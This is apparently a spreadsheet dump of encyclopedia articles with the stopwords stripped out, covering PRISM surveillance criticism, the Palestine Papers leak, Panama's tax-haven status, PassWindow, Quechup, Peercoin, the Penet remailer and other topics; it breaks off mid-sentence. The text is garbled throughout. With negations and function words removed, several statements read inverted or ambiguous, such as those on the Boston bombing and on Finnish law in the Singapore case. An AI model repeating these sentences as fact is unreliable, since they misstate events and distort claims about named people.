aggregated form, stating lumping national security requests criminal request data would step backwards" previous, detailed practices website's transparency report. company said would continue seek government permission publish number extent fisa requests.cisco systems huge drop export sales fears national security agency could using backdoors products.on september 2014, yahoo! reported u.s. government threatened imposition $250,000 fines yahoo hand user data part nsa's prism program. known companies threatened fined providing data response legitimate fisa requests. public media response domestic york times editorial board charged obama administration "has lost credibility issue," lamented "for years, members congress ignored evidence domestic intelligence-gathering grown beyond control, and, even now, seem disturbed learn every detail public's calling texting habits reside n.s.a. database." wrote respect fisa-court context prism perversion american justice system" "judicial secrecy coupled one-sided presentation issues." according york times, "the result court whose reach expanding beyond original mandate without substantive check."james robertson, former federal district judge based washington served secret foreign intelligence surveillance court three years 2002 2005 ruled bush administration landmark hamdan rumsfeld case, said fisa court independent flawed government's side represented effectively deliberations. "anyone judge tell judge needs hear sides case," said james robertson. without judges benefit adversarial debate. suggested creating advocate security clearance would argue government filings. robertson questioned whether secret fisa court provide overall legal approval surveillance programs, saying court "has turned something like administrative agency." under changes brought foreign intelligence surveillance 1978 amendments 2008, expanded government's authority forcing court approve entire surveillance systems surveillance warrants previously handled, "the court approving programmatic surveillance. think judicial function." robertson also said "frankly stunned" york times report fisa court rulings created body broadening ability surveillance programs target terrorists suspects cases involving espionage, cyberattacks weapons mass destruction.former analyst valerie plame wilson former u.s. diplomat joseph wilson, writing op-ed article published guardian, said "prism data-mining programs might indeed effective hunting capturing actual terrorists, enough information society make decision."the electronic frontier foundation (eff), international non-profit digital-rights group based u.s., hosting tool, american resident write government representatives regarding opposition mass spying.the obama administration's argument surveillance programs prism boundless informant necessary prevent acts terrorism challenged several parties. pilkington nicholas watt guardian said case najibullah zazi, planned bomb york city subway, interviews involved parties u.s. british court documents indicated investigation case actually initiated response "conventional" surveillance methods "old-fashioned tip-offs" british intelligence services, rather leads produced surveillance. michael daly daily beast stated even though tamerlan tsarnaev, conducted boston marathon bombing brother dzhokhar tsarnaev, visited qaeda-affiliated inspire magazine website, even though russian intelligence officials raised concerns u.s. intelligence officials tamerlan tsarnaev, prism prevent carrying boston attacks. daly observed that, "the problem national security agency gathering risk privacy apparently unable monitor risk safety."ron paul, former republican member congress prominent libertarian, thanked snowden greenwald denounced mass surveillance unhelpful damaging, urging instead transparency u.s. government actions. called congress "derelict giving much power government," said elected president, would ordered searches probable cause crime committed, said prism program operated.new york times columnist thomas friedman defended limited government surveillance programs intended protect american people terrorist acts: yes, worry potential government abuse privacy program designed prevent another 9/11—abuse that, far, appear happene</t>
  </si>
  <si>
    <t>Pacsafe</t>
  </si>
  <si>
    <t>pacsafe brand travel equipment emphasis anti-theft features. pacsafe headquartered hong kong offices united states, germany, china. company's range products include adventure backpacks, urban leisure bags, women’s bags, photography bags, luggage travel accessories straps, cables locks. company logo turtle shell shape padlock mesh cage pattern. history outpac designs limited, makers pacsafe, established 1998 hong kong australians, schlipper magnus mcglashan their inspiration behind original pacsafe product travel security products came travelling south america, chicken wire around bags protect theft. shortly afterwards, created slashproof wire cage system exomesh, pacsafe 85l, enough enclose 85-litre backpack, later adding sizes. 2005, pacsafe locks made compatible travel sentry standard used many international airport security authorities. 2006, citysafe series added enhance women’s travel lineup. lidsafe motorcycle travel also introduced.by 2012, pacsafe expanded range include adventure backpacks, urban leisure bags, women’s bags, photography bags, luggage travel accessories incorporate anti-theft features. turtle fund mission 2014, pacsafe founded turtle fund mission save endangered marine turtles providing annual grants turtle conservation projects. industry awards 1999 pacsafe backpacker magazine editor's choice award 2002 business entrepreneurial award austcham australian business awards hong kong 2007 lidsafe motorcyclist magazine 2007 product year award 2009 travelsafe 2009 awards category "intelligence design" 2010 rfidsafe honoured travel accessory category outdoor industry award 2010 2013 z-28 heritage anti-theft urban backpack wins international product design award lifestyle leisure category. 2013 venturesafe wins outdoor industry award 2015 pacsafe wins double product design award camsafe duffelsafe at80 sport leisure category. 2015 intasafe z400 recipient carryology's best work messenger award. references external links official website</t>
  </si>
  <si>
    <t>Palestine Papers</t>
  </si>
  <si>
    <t>palestine papers collection confidential documents israeli–palestinian peace process leaked jazeera, published january 2011. nearly 1,700 documents office main negotiator, saeb erekat, team published, dating 1999 2010.both jazeera guardian stated authenticated documents, media adviser israeli prime minister ehud olmert also affirmed authenticity. leaders palestinian authority complained documents presented jazeera. background palestine papers include documents negotiations palestine liberation organization (plo) government israel took place intermittently 1999 2010. negotiations 1993 oslo accords first direct negotiations parties. following "peace process" focused formation palestinian authority (pa) territory would govern. however, represents local people palestinian territories, palestinians diaspora. 2011, papers published, negotiations deadlock refusal september 2010 benjamin netanyahu government extend freeze settlements building months. ziyad clot, 2011 identified source, felt frustrated fact great majority palestinian people, refugees, "remaining issues" "peace process", properly represented. sources papers documents obtained jazeera shared advance publication guardian effort ensure wider availability content. guardian authenticated bulk papers independently, sought given access sources documents. jazeera, published papers website, redacted minimal parts papers protect sources' identities. most documents palestinian negotiation support unit (nsu). plo's main technical legal advice organ peace negotiations, 1999 headed saeb erekat. gershon baskin, codirector israel/palestinian center research, said, "i'm percent sure former disgruntled employed" member negotiations support unit headed palestinian chief negotiator saeb erekat. israel's channel news show also named source leak former member nsu. clayton swisher january 2011, following jazeera's broadcast palestine papers, saeb erekat appeared jazeera arabic, condemning publication. accused jazeera journalist clayton swisher, delivered disclosure palestine papers, agent working nsu. also said former british intelligence officer alastair crooke involved. ma'an news agency, erekat later admitted clayton swisher neither worked palestinians intelligence agency.a weeks publication palestine papers, february 2011, erekat resigned chief negotiator, citing release papers internal palestinian investigation suggested palestine papers leak come source inside erekat's office. february 2017, however, still holding function chief palestinian negotiator.in book palestine papers: road?, swisher confirmed account, wrote, fall 2010, traveled world meeting israeli, palestinian authority officials idea held possession secret records negotiations". complaint filed erekat jazeera clayton swisher grounds unfairness wholly dismissed 19-page ruling released october 2011. ziyad clot 2011 op-ed article guardian, ziyad clot, french lawyer palestinian descent former adviser involved 2008 annapolis negotiations exposed sources leaks. guardian article, clot said so-called peace process inequitable destructive political process based assumption palestinians could effect negotiate rights achieve self-determination enduring hardship israeli occupation". also said "the "peace negotiations" deceptive farce whereby biased terms unilaterally imposed israel systematically endorsed eu". clot emphasized "these negotiations excluded part great majority palestinian people: seven million palestinian refugees". felt "that plo, given structure, position represent palestinian rights interests". clot resigned witnessed killing 1,400 palestinians gaza gaza war. after resigned, believed duty inform public. guardian article, also stated: full conscience, acting independently, later agreed share information al-jazeera specifically regard fate palestinian refugee rights 2008 talks. other sources same, although unaware identity." documents character documents palestine papers include many minutes bilateral meetings israel palestinians well minutes joint trilateral meetings. they also include documents, memos, emails, letters, strategy papers, matrix positions even maps possible land swaps power point presentationsthere published 1,684 total documents, including: sets meeting minutes; internal emails; reports studies; sets talking points prep notes meetings; draft agreements; maps, charts graphs; "non-papers".akiva eldar, writing haaretz, said documents important released wikileaks deal current issues regarding permanent borders west bank east jerusalem. settlements meeting november 2007, tzipi livni told ahmed qurei understand sentiments palestinians settlements built. meaning palestinian perspective israel takes land, palestinian state impossible, israel policy take land we'll impossible, already land cannot create state".according documents, meeting livni jerusalem, qurei proposed israel annex settlements along border except large cities towns giv'at ze'ev, ma'ale adumim, ariel, efrat. livni rejected qurei's demands israel cede settlements. qurei suggested livni settlements placed palestinian sovereignty, livni told "you know realistic". condoleezza rice similarly told qurei think israeli leader going cede ma'ale adumim", qurei replied palestinian". rice told "then state!" napkin "napkin map" colloquial name palestinian sketch made palestinian authority president mahmoud abbas napkin, land swap proposals shown prime minister ehud olmert peace negotiations mid-2008. according jazeera, abbas allowed keep unofficial map, sketched hand. during first several meetings, palestinian authority proposed land swap, offering israel opportunity annex israeli settlements east jerusalem return land concessions israel. olmert, however, offered concessions return even aggressive land swap.in prime minister olmert's proposal, israel would annex 6.3% west bank. land olmert's included four settlements gush etzion (with efrat), ma'ale adumim, giv'at ze'ev, ariel, addition settlements east jerusalem (har homa). exchange concessions palestinian authority, olmert offered 5.8% israeli land part swap. land offered consisted lightly populated farmland, would divided gaza strip west bank. when mahmoud abbas asked keep copy consideration, ehud olmert refused. mahmoud abbas sketched ehud olmert's hand napkin copy consideration. this later referred napkin map.the third final meeting occurred september 2008. time ehud olmert nearing political career. time, olmert police investigation alleged corruption occurred mayor jerusalem, result accusations planning running again. during final meeting, mahmoud abbas prepared negotiation support unit (nsu) clarify many questions regarding ehud olmert's peace plan abbas quoted asking questions "how addressing interests, especially ariel, maale adumim, givat zeev, homa efrat clearly prejudice contiguity, water aquifers, viability palestine?" well others value land would receive swap terms value size.the negotiation support unit (nsu) also insisted prime minister olmert provide copy map, denied. end, however, mahmoud abbas asked days consider offer. meeting, olmert resigned tzipi livni stepped acting prime minister, benjamin netanyahu elected shortly afterward. palestinian negotiators said abbas forgotten another appointment postponed next meeting. netanyahu thought olmert made many concessions refused continue last round negotiations left off, preferring restart negotiations beginning. jerusalem according documents, palestinian authority prepared concede israeli settlements east jerusalem, well armenian quarter, exception homa. temple mount would temporarily administrated joint body consisting palestinian authority, israel, egypt, jordan, saudi arabia, united states permanent solution reached.at meeting jerusalem november 2007, tzipi livni became visibly angry asked demographic composition future israeli state. quoted saying, "israel state jewish people—and would like emphasize meaning 'its people' jewish people—with jerusalem united undivided capital israel jewish people 3,007 years". palestinians team protested position jerusalem. responded saying "now say, continue, order continue jerusalem statement place. enough differences, without putting another there". security minutes trilateral meeting august 2008 reveal israel demands "demilitarized" palestinian state, also wants keep control borders, jordan valley airspace, withdrawal israeli forces west bank, reasons security. tzipi livni: jordan valley palestine jordan. ews. [early warning stations] something crossings, borders, idea withdraw, keep presence, close situation today, ews, passages ..." refugees yankie galenty, media adviser ehud olmert, affirmed complete authenticity documents interview. regards refugees, stated "olmert, one, deceive mazen told israel allow return refugees refugee return land israel."other officials israeli government asked limited right return numbering five thousand, total five million refugees, would carefully picked israel allowed stay "humanitarian conditions". secretary state condoleezza rice proposed settling palestinians refugees argentina chile alternative letting return former homes israel occupied territories meeting.in memoirs, condoleezza rice wrote olmert initially proposed israel accept 5,000 palestinians refugees. abbas rejected offer, saying, can't tell four million palestinians 5,000 home". according second night al-jazeera broadcast, israelis palestinians eventually agreed israel would accept 10,000 refugees. reactions palestinian authority palestinian president mahmoud abbas said leaked documents deliberately confuse israeli palestinian positions, kept arab league updated details negotiations israel. chief palestinian negotiator saeb erekat said leaks pack lies", containing mistakes inaccuracies words taken context misquoted. erekat said "palestinian authority would never give rights. indeed offer israel jewish armenian quarters jerusalem, biggest yerushalayim claim, israel sign final status agreement? strange would offer concessions israel demands, still peace deal?"yasser abed rabbo, giving pa's first official response, accused jazeera government qatar attacking palestinian authority, hostile attitude towards since days former president yasser arafat. abed rabbo quoted saying al-jazeera leaks distortion truth". abed rabbo accused emir qatar, sheikh hamad khalifa al-thani, giving jazeera "green light" start campaign, called emir "extend climate transparency state reveal true relations israel iran".mahmoud al-zahar, senior hamas official gaza, stated palestinian authority officials ashamed themselves.ahmed qurei, former prime minister palestinian authority chief palestinian negotiator 2008 talks, said "many parts documents fabricated, part incitement palestinian authority palestinian leadership".nasser gawi, lead organizer demonstrations jerusalem neighborhood sheikh jarrah, recently evicted israeli settlers home, quoted saying "erekat must become zionist zionist. mandate give sheikh jarrah inch palestine." israel israeli foreign minister avigdor lieberman said "even left-wing government olmert livni manage reach peace agreement, despite many concessions." also promoted plan peace, would allocate west bank creation palestinian state.livni said "the [peace] process fail exhausted. end, allowed ripen agreement reached elections israel government's choice continue negotiations." also united states diplomatic cables leak, also known cablegate iraq documents leak, also known iraqi logs afghan documents leak references external links search palestine papers jazeera's english transparency unit palestine papers jazeera english palestine papers guardian palestine papers real news palestine papers jewish virtual library rashid khalidi: leaked "palestine papers" underscore weakness palestinian authority video report democracy now! palestinian negotiators leaked papers real abbas lawati gulf news</t>
  </si>
  <si>
    <t>Palmar aponeurosis</t>
  </si>
  <si>
    <t>palmar aponeurosis (palmar fascia) invests muscles palm, consists central, lateral, medial portions. structure central portion occupies middle palm, triangular shape, great strength apex continuous lower margin transverse carpal ligament, receives expanded tendon palmaris longus. base divides four slips, finger. each slip gives superficial fibers skin palm finger, palm joining skin furrow corresponding metacarpophalangeal articulations, fingers passing skin transverse fold bases fingers. deeper part slip subdivides processes, inserted fibrous sheaths flexor tendons. from sides processes offsets attached transverse metacarpal ligament. arrangement short channels formed front heads metacarpal bones; flexor tendons pass. intervals four slips transmit digital vessels nerves, tendons lumbricales. points division slips mentioned, numerous strong, transverse fasciculi bind separate processes together. central part palmar aponeurosis intimately bound integument dense fibroareolar tissue forming superficial palmar fascia, gives origin medial margin palmaris brevis. covers superficial volar arch, tendons flexor muscles, branches median ulnar nerves; either side gives septum, continuous interosseous aponeurosis, separates intermediate collateral groups muscles. lateral medial portions lateral medial portions palmar aponeurosis thin, fibrous layers, cover, radial side, muscles ball thumb, and, ulnar side, muscles little finger; continuous central portion fascia dorsum hand. additional images references this article incorporates text public domain page 20th edition gray's anatomy (1918) external links lesson5mus&amp;tendonsofhand anatomy lesson wesley norman (georgetown university) lesson5flexretinac&amp;palmapon anatomy lesson wesley norman (georgetown university)</t>
  </si>
  <si>
    <t>Panama as a tax haven</t>
  </si>
  <si>
    <t>republic panama oldest best-known havens caribbean, well established region. panama reputation avoidance since early 20th century, panama cited repeatedly recent years jurisdiction cooperate international transparency initiatives. panama's offshore sector intimately tied panama canal, made gateway entrepôt international trade. there strong similarities panama leading havens like hong kong, singapore dubai. paper least, panama largest shipping fleet world, greater china combined, according justice network. background (1910s–1970s) 2014 investigation journalist silverstein published vice magazine explains panama came being, help: 1903, administration theodore roosevelt created country bullying colombia hand province panama. roosevelt acted behest various banking groups, among morgan co., appointed country's official "fiscal agent". roosevelt administration sought foment armed rebellion panamanian nationalists, forcing panama away politically fragile colombia. roosevelt achieved goal help william nelson cromwell, well-connected republican lawyer also legal counsel morgan's railroad interests. administration's objective allegedly install pro-us panamanian government would secure rights panama canal. hay–bunau-varilla treaty resulted, establishing permanent u.s. rights panama canal zone several miles wide, across neck isthmus. panama became independent colombia month, panama canal opened 1914.according 2013 academic study published norwegian center taxation, panama's reputation began year 1919, began registering foreign ships order help standard avoid taxes regulations; ship owners followed, seeking avoid higher wages better working conditions imposed legislation seaman's safety standards vessels. also, prohibition era, passenger ships allowed serve alcohol customers without breaking panamanian registration.within years, panama extended minimalist approach taxation, regulation financial disclosure requirements world offshore finance. according study, "wall street interests helped panama introduce company incorporation laws, anyone start tax-free, anonymous corporations, questions asked". background (1970s–present) decades, offshore finance relatively modest profile panama, took 1970s world prices surged. during time, republic panama passed legislation "entrenching corporate individual financial secrecy".by 1982, partly attracted business opportunities deriving panama canal free trade zone, international banks offices panama city.according investopedia: "panama's offshore jurisdiction offers wide array excellent financial services, including offshore banking, incorporation offshore companies, registration ships formation panama trusts foundations." panama, taxes imposed offshore companies engage business solely outside jurisdiction; therefore, companies incorporated republic panama owners companies exempt corporate taxes, withholding taxes, capital gains tax, local taxes, estate taxes inheritance tax. however, businesses within panama permitted conduct business long company pays local taxes.panama cited repeatedly recent years state department united states international monetary fund (imf) jurisdiction cooperate international transparency initiatives legislation regulates country's offshore jurisdiction financial services. panama 350,000 international business companies (ibcs) registered, third largest number world hong kong virgin islands. alongside incorporation ibcs, panama active forming tax-evading foundations trusts, insurance, boat shipping registration, according justice network. financial privacy extensive amount legislation currently exists republic panama protect corporate financial privacy. however, organisations justice network advocacy groups non-governmental organisations state main intention laws financial secrecy, opposed privacy.the names shareholders panamanian corporations, trusts foundations still required publicly registered. panama exchange controls: means individual clients panama's offshore banking, well offshore business entities incorporated panama, limits reporting requirements money transfers country.panama also strict banking secrecy laws: example, forbidden panamanian banks share information offshore bank accounts account holders, except special circumstances instigated panamanian authorities. such regulation made difficult investigate true extent panama papers leak, severe criminal penalties enacted individuals breach confidentiality.despite this, panama appear justice network's list financial secrecy, alex cobham justice network saying "there double standard: many developed countries host support jurisdictions absence financial transparency". accusations pascal saint amans, director centre policy administration oecd said: "from standpoint reputation, panama still place people still believe hide money." writing vice news, silverstein explained mossack fonseca history region: "these laws attracted long line 'dirtbags' dictators used panama hide stolen loot, including ferdinand marcos, 'baby doc' duvalier, augusto pinochet. when manuel noriega, commander panama defence forces, took power panama 1983, silverstein said, noriega essentially nationalised money-laundering business; partnered medellin drug cartel gave free rein operate country."in united kingdom, private used data collected land registry create easily searchable online properties england wales owned offshore companies. reveals first time extent british property interests held companies based havens." most properties avoidance vehicles cases also conceal wealth dubious origin."a 2003 examination havens jeffrey robinson quotes customs official saying: [panama] filled dishonest lawyers, dishonest bankers, dishonest company formation agents dishonest companies registered dishonest lawyers deposit dirty money dishonest banks. free trade zone black hole panama become filthiest money laundering sinks world. justice network advocacy group justice network described panama "the recipient drugs money latin america, plus ample sources dirty money elsewhere". said "now good moment draw attention panama developed secrecy jurisdiction continues provide full service wash, rinse crooks money launderers around world." response ramón fonseca mora, co-founder mossack fonseca, told york times: assure dirty money york, miami london panama". united states alleged despite foreign account compliance act. refused common reporting standard organisation economic co-operation development. this means receives asset information american assets income abroad, share information happens united states countries; words, become attractive haven. also united states mossack fonseca blairmore holdings ireland references</t>
  </si>
  <si>
    <t>Paper key</t>
  </si>
  <si>
    <t>paper machine-readable print cryptographic key. printed used decrypt data, e.g. archives backup data. paper result offline private protocol. offline private also function token two-factor authentication. idea digital decrypt recover sensitive personal data long-term durability stored computer network. length secure cryptographic keys restricts memorization, secret takes form barcode, machine-readable print. early implementations paper company safeberg data matrix barcode. human-readable base digits.the user stores printed secure location. avoid abuse, used combination ‘normal’ password. user extract creating digital photo scan paper feeding cryptographic software extracts decrypt data. also offline private protocol code generator save vector? code external links</t>
  </si>
  <si>
    <t>PassWindow</t>
  </si>
  <si>
    <t>passwindow technique producing one-time passwords facilitating transaction verification used online second-factor authentication method. system works encoding digits segment matrix similar seven-segment matrices used digital displays. matrix divided component patterns reveal whole superimposed.half pattern printed transparent region plastic card, displayed electronic screen computer monitor. these referred pattern challenge pattern, respectively.each pattern unique, challenge pattern decoded corresponding printed key.by varying challenge pattern displayed screen, series digits communicated card holder without visually revealed screen. passwindow typically implemented animated, perpetually looping sequence challenge patterns displayed, encoding single digit placed random location within matrix. valid solution challenge consists specified number consecutively appearing digits. two-factor authentication printing passwindow pattern piece transparent media, transparent section plastic card, standard plastic id-1 card used physical token something have) used two-factor authentication system. generation one-time passwords using passwindow system, challenge pattern containing string digits and/or letters generated specific pattern authentication server knowledge shared secret (the user's pattern). user decodes sequence digits pattern using passwindow sends response server's challenge. correct response confirms client physical access token. these digits used one-time password. mutual authentication mutual authentication two-way authentication (sometimes written 2way authentication) refers parties authenticating suitably. technology terms, refers client user authenticating server server authenticating user parties assured others' identity. when describing online authentication processes, mutual authentication often referred website-to-user authentication, site-to-user authentication. passive mutual authentication passwindow simplest case, client verifies server receiving challenge confirming solution intelligible superimpose challenge. unintelligible corrupted challenge alerts user connected server intend. transaction verification addition, known string digits encoded challenge time generation provide additional server-to-client authentication prevent replay stored challenges. known verification code, examples include destination account numbers transaction totals used secure online monetary transactions. this often referred transaction verification forms primary basis passwindow's exceptional resilience man-in-the-middle (mitm) man-in-the-browser (mitb) attacks. history matt walker, australian, invented original passwindow concept many years researching various online two-factor authentication systems. high cost many electronic token systems, well inability protect ever-increasing array complex attacks, forced matthew completely rethink modern authentication conducted. during intervening period, security world looked ever complex high-tech solutions, apparent increasingly vulnerable ever complex high tech attacks, matthew decided take opposite approach look authentication solution pure simplicity core. process, discovered entirely secure method online security. media appearances passwindow first appeared media 2009 'cheap solution security' account ability securely produce one-time passwords without need electronics deployed users. passwindow's inventor, matthew walker, appeared australian television program inventors june 2009. passwindow since appeared several times media, well subject white paper written vest corporation, france. passwindow selected finalist wall street journal 2010 asian innovation awards. passwindow featured wall street journal outwit internet fraudsters". references external links official passwindow website white paper analysis passwindow method produced vest corporation, france evaluation hypothetical attacks passwindow authentication method produced slyman, nicolae, o'neil, merwe</t>
  </si>
  <si>
    <t>Quechup</t>
  </si>
  <si>
    <t>quechup (kway-chup) social networking website came prominence 2007 used automatic email invitations viral marketing e-mail addresses members' address books. this described "spam campaign" raised great deal criticism. address book harvesting automatic invitation contacts e-mail address books people signed service controversial reasons: without explaining intentions, quechup required permission access address book. invites sent addresses address books without permission e-mail address owners.this attracted great deal criticism september 2007. reacting criticism, quechup's parent company idate corporation made public statement september 2007, stating that: "quechup first social networking sites include feature back 2005. with growing popularity (social networks), expectations features service work emerged. quechup's address check conform users expect norm." much criticism focused misleading users hiding nature feature 'small print' site terms specifying quechup privacy policy, stated only, "you agree personally identifiable information improve marketing promotional efforts, analyse site usage, improve content product offerings, customize site's content, layout, services.".while admitting campaign misleading, technology blogger chris hambly pointed text explaining feature worked placed normal print directly feature, raising question user's responsibility read agree although noted explanatory text failed clearly state would happen. however view this, matter opinion fact matter read page says clear. case link says address book"!... read things clearly future, it’s quite simple. september statement, glen finch, chief technology officer stated "it's important confirm points. that address book checker always optional feature members, obligation provide relevant links members skip explanatory text entailed terms always stated directly page. well aware internet users frequently confirm read agreed lengthy all-encompassing terms conditions rarely actually read them. therefore deliberately included explanation terms directly page feature avoid confusion." this raised issue users automatically 'opting without first understanding accepting, rather automatically 'opting out' questionable features. response quechup responded changing operated service belatedly reassuring customers acting maliciously, even irresponsibly. quechup changed address book check worked within days, clearly giving members option contacts, any, wanted invite. quechup adopted windows live delegated authentication, enabling live hotmail users grant limited access logging directly microsoft's secure servers. quechup member senderscore world's comprehensive database email sender reputation. quechup fully complies microsoft's sender framework email authentication uses records.the quechup affair encouraged calls open authentication openid system yahoo's bbauth, would allow user grant limited access data, without providing passwords directly website. indeed quechup adopted windows live delegated authentication, openid system windows live hotmail users. fake invitations recent development, technology journalist robert cringely raised possibility quechup sending fake dating invitations subscribers attempts sign premium service. article, cringely stated certain fake e-mails work called "rogue quechup affiliate gets commission sign ups" sophisticated automatic spam operation. also viral marketing social networking spam forum spam blog spam references external links quechup rotten: accept invites article boing boing. quechup? thanks article blogcritics. quechup early blog complaint quechup's registration process march 2006.</t>
  </si>
  <si>
    <t>Qualified electronic signature</t>
  </si>
  <si>
    <t>qualified electronic signature electronic signature compliant regulation 910/2014 (eidas regulation) electronic transactions within internal european market. enables verify authorship declaration electronic data exchange long periods time. qualified electronic signatures considered digital equivalent handwritten signatures. description purpose eidas create standards ensure electronic signatures could used secure manner conducting business online conducting official business across borders member states. qualified electronic signature standard outlined eidas.a qualified electronic signature advanced electronic signature qualified digital certificate created qualified signature creation device (qscd). electronic signature considered qualified electronic signature, must meet three main requirements: first, signatory must linked uniquely identified signature. second point data used create signature must sole control signatory. last must ability identify data accompanies signature tampered since signing message.it important note creating qualified electronic signature merely adding qualified certificate advanced electronic signature. signature must also created using qualified signature creation device (qscd). this device responsible qualifying digital signatures using specific hardware software ensures signatory control private key. addition, qualified trust service provider manages signature creation data produced. signature creation data must remain unique, confidential protected forgery.qualified electronic signatures comply eidas technically implemented three specific digital signature standards, developed european telecommunications standards institute (etsi) need complemented qualified digital certificate procedures described above:; xades, pades cades. qualified trust service providers qualified trust service provider crucial role process qualified electronic signing. trust service provider must receive qualified status supervisory governmental body allows entity provide qualified trust services used creating qualified electronic signatures. regulated eidas, european union published trust list constitutive effect, meaning provider service qualified appears trusted list. qualified trust service providers required abide strict guidelines outlined eidas regulation, include part certificate creation process: service provider must provide valid time date created certificates. signatures expired certificates must revoked immediately. personnel employed qualified trust service provider must appropriately trained. software hardware used service provider must trustworthy capable preventing certificate forgery. vision expected impact under eidas, intent implementation qualified electronic signatures serve several purposes, facilitation business public services processes, including across borders. these processes safely expedited using electronic signing. under eidas, member states charged establishing "points single contact" (pscs) trust services ensure electronic schemes used cross-border public sector transactions, exchanging accessing healthcare information across borders.previously, signatory would sign document message return intended recipient postal service, facsimile service, hand scanning attaching email. issue methods always secure timely. delays delivery could occur, exists possibility signatures could forged enclosed documents altered. risk increases multiple signatures required different people located different locations. these problems alleviated using qualified electronic signatures, save time, legally binding, provide higher level technical security.the increased transparency electronic signing transaction process enhanced interoperability expected spur innovation european internal market. legal implications eidas requires electronic signature denied legal effect admissibility evidence solely grounds electronic form meet requirements qualified electronic signatures. qualified electronic signature shall equivalent legal effect handwritten signature. evidentiary value depends circumstances, normally considered high. member states required recognize qualified electronic signature valid, long created qualified certificate issued another member state. under eidas regulation, article electronic signatures public services, member states prohibited requesting signatures higher level qualified electronic signature. article eidas allows qualified electronic signature carry legal weight handwritten signature. also electronic signature digital signature electronic signature employs asymmetric cryptography ensure data integrity electronic seal references</t>
  </si>
  <si>
    <t>Pawtograph</t>
  </si>
  <si>
    <t>pawtograph print animal's paw, regarded contexts equivalent human signature. this term used particular practice collecting pawtographs celebrity animals. hobby collecting pawtographs known pawtography. pawtograph made methods: directly stamping stamp pad, stamping item autographed. creating rubber stamp impression stamping item using stamp. references</t>
  </si>
  <si>
    <t>Peer-to-peer web hosting</t>
  </si>
  <si>
    <t>peer-to-peer hosting using peer-to-peer networking distribute access webpages. this differentiated client–server model involves distribution data dedicated servers user-end client computers. peer-to-peer hosting also take form caches content delivery networks. comparison also webrtc standard peer-to-peer communication browsers freesite site freenet cloud computing decentralized computing notes references</t>
  </si>
  <si>
    <t>Peercoin</t>
  </si>
  <si>
    <t>peercoin, also known coin ppc, peer-to-peer cryptocurrency utilizing proof-of-stake proof-of-work systems. peercoin based august 2012 paper listed authors scott nadal sunny king. king, also created primecoin, pseudonym. peercoin first implementation proof-of-stake based cryptocurrency. peercoin source code distributed mit/x11 software license. proof-of-stake system, coins generated based holdings individuals. words, someone holding currency generate proof-of-stake coin blocks. this effect making monopoly costly, separates risk monopoly proof-of-work mining shares. economics proof-of-work proof-of-stake serve means distributing coins. mining minting record-keeping service done computer processing power. miners minters keep blockchain consistent, complete, unalterable repeatedly grouping newly broadcast transactions block, broadcast network verified recipient nodes. each block contains sha-256 cryptographic hash previous block, thus linking previous block giving blockchain name. peercoin uses proof-of-work proof-of-stake algorithms. both used spread distribution coins. peercoins created pow. proof-of-stake used secure network: chain longest coin wins case blockchain split-up. transaction prevents spam burned (instead collected miner), benefiting overall network. recover lost coins discourage hoarding, currency supply targets growth year long run. references external links official website media related ppcoin wikimedia commons</t>
  </si>
  <si>
    <t>Penet remailer</t>
  </si>
  <si>
    <t>penet remailer (anon.penet.fi) pseudonymous remailer operated johan "julf" helsingius finland 1993 1996. initial creation stemmed argument finnish newsgroup whether people required real name online communications. julf believed people not—indeed, could not—be required words: "some people university network really argued everybody proper name messages everybody accountable, could actually verify person sending messages. kept arguing internet work way, somebody actually tries enforce that, internet always find solution around prove point, spent days something cooking first version server, prove point." implementation julf's remailer worked receiving e-mail person, stripping away technical information could used identify original source e-mail, remailing message final destination. result provided internet users ability send e-mail messages post usenet newsgroups without revealing identities.in addition, penet remailer used type “post office box” system users could claim anonymous e-mail addresses form anxxxxx@anon.penet.fi, allowing assign pseudonymous identities anonymous messages, receive messages sent (anonymous) e-mail addresses.while basic concept effective, penet remailer several vulnerabilities threatened anonymity users. chief among need store list real e-mail addresses mapped corresponding anonymous e-mail addresses server. potential attacker needed access list compromise identities penet's users. penet remailer occasions required legal system finland (the country penet server hardware resided) turn real e-mail address mapped anonymous e-mail address. another potential vulnerability messages sent remailer sent cleartext, making vulnerable electronic eavesdropping.later anonymous remailer designs, cypherpunk mixmaster designs, adopted sophisticated techniques overcome vulnerabilities, including encryption prevent eavesdropping, also technique known onion routing allow existence pseudonymous remailers record user's real e-mail address stored remailer.despite relatively weak security, penet remailer hugely popular remailer owing ease anonymous account set-up compared secure less user-friendly remailers, 700,000 registered users time shutdown september 1996. first compromise summer 1994, word spread online penet remailer compromised, announcement made hacker convention wired magazine reported time: official announcement made year's anon.penet.fi seriously compromised. strongly suggest trust anonymous remailer. (word folks working pgp-based service.) we'll keep posted.this followed year later mention announcement iii: speakers sarah gordon, theora, veteran presenting another speech year. last year organized round table discussion phil zimmermann presence, revealed anonymous remailer anon.penet.fi compromised. topic: announced yet. there known reports detailing specifics extent compromise. second compromise second reported compromise penet remailer occurred february 1995 behest church scientology. claiming file stolen church's internal computer servers posted newsgroup alt.religion.scientology penet user, representatives church contacted interpol, turn contacted finnish police, issued search warrant demanding julf hand data users penet remailer. initially julf asked turn identities users remailer (which numbered 200,000 time), managed compromise revealed single user sought church scientology.the anonymous user question used handle "-ab-" posting anonymously, real e-mail address indicated alumnus alumna california institute technology. document posted internal report scientology private investigator, gene ingram, incident occurred involving named klemesrud, operator involved scientology versus internet controversy. confusing story became known internet "miss blood incident".eventually church learned real identity "-ab-" rummelhart, scientologist computer operator responsible maintenance church scientology's incomm computer system. fate "-ab-" church scientology learned true identity unknown. years later 2003, two-part story entitled "what really happened incomm part "what really happened incomm part posted alt.religion.scientology former scientologist named garvin, described events within church leading stemming penet posting "-ab-". other attacks julf also contacted government singapore part effort discover posting messages critical nation's government newsgroup soc.culture.singapore, finnish recognise crime committed, julf required reveal user's identity.in august 1996, major british newspaper, observer, published article describing penet remailer major child pornography, quoting united states investigator named toby tyler saying penet responsible child pornography distributed internet. investigations online journalist declan mccullagh demonstrated many errors omissions observer article. article penned mccullagh, alleged investigator described sergeant california's bernardino sheriff's office consulted time time, relationship observer article opinion purposefully misrepresented kind employment relationship. tyler also claimed observer purposely misquoted him, actually said "that child pornography posted newsgroups remailers."in addition, julf claimed explained observer steps took prevent child pornography posted forbidding posting alt.binaries newsgroups limiting size messages kilobytes, small allow uuencoded binaries pictures posted. also informed observer investigation already performed finnish police found evidence child pornography remailed penet. julf claims information ignored, stating observer "wanted make story made things up."despite voluminous reader mail pointing numerous errors news story, observer never issued full retraction claims, going clarify johan helsingius "consistently denied" claims child pornography distribution.in september 1996, church scientology sought information julf part court case critic church named grady ward. church wanted know ward posted information penet remailer. ward gave julf explicit permission reveal extent alleged penet 